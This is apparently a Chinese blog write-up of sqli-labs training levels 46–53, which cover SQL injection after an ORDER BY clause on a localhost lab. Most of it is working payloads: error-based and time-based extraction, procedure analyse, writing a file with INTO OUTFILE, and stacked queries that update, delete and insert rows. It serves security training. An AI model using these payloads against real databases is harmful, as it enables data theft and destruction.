less-46-47-48-49-50-51-52-53

最新推荐文章于 2023-01-12 18:59:14 发布
最新推荐文章于 2023-01-12 18:59:14 发布
阅读量654 收藏
点赞数
分类专栏: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44598397/article/details/89261570
版权

LESS-46在这里插入图片描述
1、order by的原理为排序,所以通过sort+asc或desc的输出是否相同便可知是否有使用到排序(ASC 代表结果会以由小往大的顺序列出,而 DESC 代表结果会以由大往小的顺序列出。如果两者皆没有被写出的话,那我们就会用 ASC。)

输入?Sort=1 desc在这里插入图片描述
输入:?Sort=1 asc在这里插入图片描述
两者不同说明这里使用了order by在这里插入图片描述
1、报错注入
输入:http://127.0.0.1/sqlilabs/Less-46/?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ ),0x7e))–+在这里插入图片描述
2、延时注入:http://127.0.0.1/sqlilabs/Less-46/?sort=1 and if(ascii(substr(database(),1,1))=115,1,sleep(5))–+在这里插入图片描述
(2)利用 procedure analyse 进行注入
procedure analyse 参数后注入,利用 procedure analyse 参数,我们可以执行报错注入。同时,在 procedure analyse 和 order by 之间可以存在 limit 参数,在这里插入图片描述
输入:http://127.0.0.1/sqlilabs/Less-46/?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)在这里插入图片描述
(3)输出导入导出
http://127.0.0.1/sqlilabs/Less-46/?sort=1 into outfile “c://phpStudy//PHPTutorial//www//sqlilabs//Less-46//bb.txt”%23在这里插入图片描述在这里插入图片描述
Less-47

与上一题不同的是sql语句中有单引号闭合。
(1)报错注入
输入:http://127.0.0.1/sqlilabs/Less-47/?sort=1’ and extractvalue(1,concat(0x7e,(select database()),0x7e))–+在这里插入图片描述(2)延时注入
输入:http://127.0.0.1/sqlilabs/Less-47/?sort=1’ and if(ascii(substr(database(),1,1)) =115,0,sleep(5))–+在这里插入图片描述
(3)procedure analyse输入:http://127.0.0.1/sqlilabs/Less-47/?sort=1’ %20%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)–+在这里插入图片描述
LESS-48
本关与LESS-46相似但是没有报错输出,故不能用报错注入,其他相同,不详写
在这里插入图片描述
(1)延时注入
http://127.0.0.1/sqlilabs/Less-48/?sort=1 and if(ascii(substr(database(),1,1))=115,0,sleep(5))–+在这里插入图片描述
LESS-49
本题与47题相似但是没有报错注入,不详写在这里插入图片描述LESS-50
在这里插入图片描述
执行 sql 语句我们这里使用的是 mysqli_multi_query()函数,而之前我们使用的是 mysqli _query(),区别在于 mysqli_multi_query()可以执行多个 sql 语句,而 mysqli_query()只能执行一个 sql 语句,那么我们此处就可以执行多个 sql 语句进行注入,也就是我们之前提到的 statcked injection。 (可参考38题解释)

(1)输入:http://127.0.0.1/sqlilabs/Less-50/?sort=1 ; update food set username=‘world’ where id=2 --+在这里插入图片描述在这里插入图片描述Less-51
在这里插入图片描述
与上一题的区别为这里为单引号闭合
输入:http://127.0.0.1/sqlilabs/Less-51/?sort=1’ ; delete from food where id=‘3’–+在这里插入图片描述在这里插入图片描述LESS-52在这里插入图片描述
此处与less-50的区别为,这里没有报错输出
输入:http://127.0.0.1/sqlilabs/Less-52/?sort=1 ; insert into food(id,price,username) values (3,40,‘feel’)–+在这里插入图片描述Less-53
这里和51题的区别为,虽都为单引号闭合但是此处没有报错输出;在这里插入图片描述
Less-53
这里和51题的区别为,虽都为单引号闭合但是此处没有报错输出;在这里插入图片描述
输入:http://127.0.0.1/sqlilabs/Less-53/?sort=1’ ; create table hello like users; 在这里插入图片描述在这里插入图片描述

林夕林@
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-46474849(sqli-labs闯关指南 46474849)—order by 相关注入
m0_54899775的博客
12-28 1090
sqli-labs Less-46474849(sqli-labs闯关指南 46474849)—order by 相关注入
3GPP-23501-g10(中文版).pdf
07-28
4.2.10 ATSSS 支持的架构参考模型 51 4.3 与 EPC 的互通 52 4.3.1 非漫游架构 52 4.3.2 漫游架构 53 4.3.3 5GC 通过非 3GPP 接入与 E-UTRAN 连接到 EPC 55 之间的互通 4.3.3.1 非漫游架构 55 4.3.3.2 漫游架构 56 ...
4种排序方式比较:order by, sort by, distribute by, cluster by
CharlesCFA的博客
02-21 6930
文章记录了4种排序方式:order by, sort by, distribute by, cluster by 总结: order by 全局排序,只有一个 Reducer,通过order对字段进行降序或者升序 sort by 对于大规模的数据集 order by 的效率非常低。在很多情况下,并不需要全局排序,此时可以使用 sort by。Sort by 为每个reducer 产生一个排序文件。每个 Reducer 内部进行排序,对全局结果集来说不是排序。 distribute by 在有些情
sqli-labs (less-47)
kukudeshuo的博客
03-15 635
sqli-labs (less-47) 进入47关,我们发现跟less-46一样要我们输入sort值这里我们输入sort=1试试 http://127.0.0.1/sql1/Less-47/?sort=1' 根据错误显示判断闭合方式为’–+,并且为字符型注入,因为有完整错误回显,所以这里可以使用报错注入攻击和时间盲注 报错注入攻击 查看当前库 http://127.0.0.1/sql1/Less-47/?sort=1' and updatexml(1,concat(0x7e,(database()),
基于Sqli-Labs靶场的SQL注入-46~53
Joker
01-12 635
这一片博客我主要讲解 Order By注入,其实 Order By注入只是把参数变了,其余的操作都和之前参数为ID的时候大同小异,最大的区别就是 Order By注入不能使用Union联合注入。
SQL注入 Less46(order by后的注入+rand()布尔盲注)
开心星人的博客
07-30 760
对users表随机进行排序。 rand()返回的是一个0-1的浮点数,order by 后面跟的是列名或列号。 这里其实可以理解成users表中增加了一个rand字段,字段值是随机产生的。根据该rand字段来对users表进行排序。所以就到达了随机排序的效果...
Less 49
老司机开代码的博客
08-04 162
文章目录1. 题目分析2. 注入过程 1. 题目分析 通过?sort=2%27 and sleep(0.5) --+可判断存在时间注入漏洞。并且传入的参数类型为字符串。 因此,利用rand()进行布尔盲注是无法使用的。 然后再来测一下双注入。 网站给报错也屏蔽了,双注入也凉凉了。 那么我们使用时间注入。 2. 注入过程 既然确定了注入的手段,过程就是老生常谈的事情了。 给出一条payload ?sort=2%27 and if(ascii(substr(database(),1,1))=115,sleep
Time for a Model Change: Re-engineering the Global Automotive Industry
09-27
Diseases of underdevelopment (1) – noxious emissions......Page 51 Diseases of underdevelopment (2) – road deaths......Page 56 Diseases of development – traffic congestion......Page 66 Social limits...
less2-1a.rar_595 数码管_74hc595 0-_74hc595 C51_hc595_C51
09-19
74HC595 驱动两个数码管0-99.C51..已测试通过
经典前端代码下(51-100)
06-01
在“经典前端代码下(51-100)”这个资源中,包含了大量前端开发中的实用代码片段和模板,这些代码示例旨在帮助开发者提升技能,实现更优雅的编程方式。下面将针对这个主题,深入讲解一些重要的前端知识点。 1. **...
前端大厂最新面试题-css.docx
最新发布
06-06
49. 将元素的display属性设为inline-block后,能把多个元素排列在一行中,但元素之间会间隙,使用margin、padding等属性可以去除间隙。 50. display:none与visibility:hidden都可隐藏元素,但display:none会让元素...
Sqli-labs之Less:46-49
→_→
05-16 1194
Less-49 基于错误_GET_数字型_排序注入 这一关首先要说一下的是,在前面的关卡中我们大多是使用 id这个参数来获取到正常的页面,但在这几关中我们要使用 sort 这个参数,因为后台源代码这样设置了 那么接下来我们看一下正常的页面: 我们看到了正常的页面,从中我们也发现了数字的不同,页面给我们呈现出的账号表格中的顺序是不同的,那么这就是我们这几关要说的知识点。 ...
Less 46 (ORDER BY 后的注入)
老司机开代码的博客
08-04 243
文章目录1. 题目分析2. 注入过程2.1 利用rand()实现布尔盲注2.2 时间盲注2.3 双注入 1. 题目分析 先看一下源码中的SQL $id=$_GET['sort']; $sql = "SELECT * FROM users ORDER BY $id"; 需要注意的是,此处我们输入的参数应该是?sort=xxx,并且后台没有对这个参数进行过滤。 但是和以往不同的是,我们的注入位置不再是WHERE后面,而是在ORDER BY之后。 目前有2中注入思路: 利用rand()实现布尔盲注 时间盲注
Sqli-labs less 52
weixin_34295316的博客
08-11 531
Less-52 和less50是一样的,只是这里的mysql错误不会在前台显示,但是对于stacked injection是一样的利用方式 http://127.0.0.1/sqli-labs/Less-52/index.php?sort=1;create%20table%20less52%20like%20users 转载于:https://www.cnblogs.com/lcamry/...
sqli-Labs————less-46order by 之后的注入)
Fly_鹏程万里
05-21 1321
前言从这一关开始将会介绍一下order by相关的注入内容。Less-46源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.o...
Sqli-labs less 50
weixin_34167819的博客
08-11 493
Less-50 从本关开始我们开始进行order by stacked injection! 执行sql语句我们这里使用的是mysqli_multi_query()函数,而之前我们使用的是mysqli_query(),区别在于mysqli_multi_query()可以执行多个sql语句,而mysqli_query()只能执行一个sql语句,那么我们此处就可以执行多个sql语句进行注入,也就是...
sqli-labs————Less-52
Fly_鹏程万里
05-22 311
Less-22执行的sql语句:$sql="SELECT * FROM users ORDER BY $id";根据该sql语句直接构建以下payload:http://192.168.11.136/sqli-labs/Less-52?sort=1;create table less52 like users--+
sqli-labs (less-48)
kukudeshuo的博客
03-15 397
sqli-labs (less-48) 进入48关,输入sort=1 http://127.0.0.1/sql1/Less-48/?sort=1' 这里发现没有错误回显,那我们只能去猜闭合方式了 http://127.0.0.1/sql1/Less-48/?sort=1--+ #回显正常 http://127.0.0.1/sql1/Less-48/?sort=1'--+ #回显错误 判断这里为数字型注入,因为没有错误回显所以这里我们只能使用时间盲注,时间盲注在less-46我详细的介绍了,这里我就
Write a loop to read as many as numbers till you enter '-99' (if your input is -99 go out from the loop), and find a) how many numbers Less than 50. b) how many numbers Greater than 100. c) how many +ve numbers d) how many -ve numbers e) how many numbers in between 51 and 99.
06-06
Sure, here's the code to solve your problem: ```python ... The program will then display how many numbers are less than 50, greater than 100, positive, negative, and between 51 and 99.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值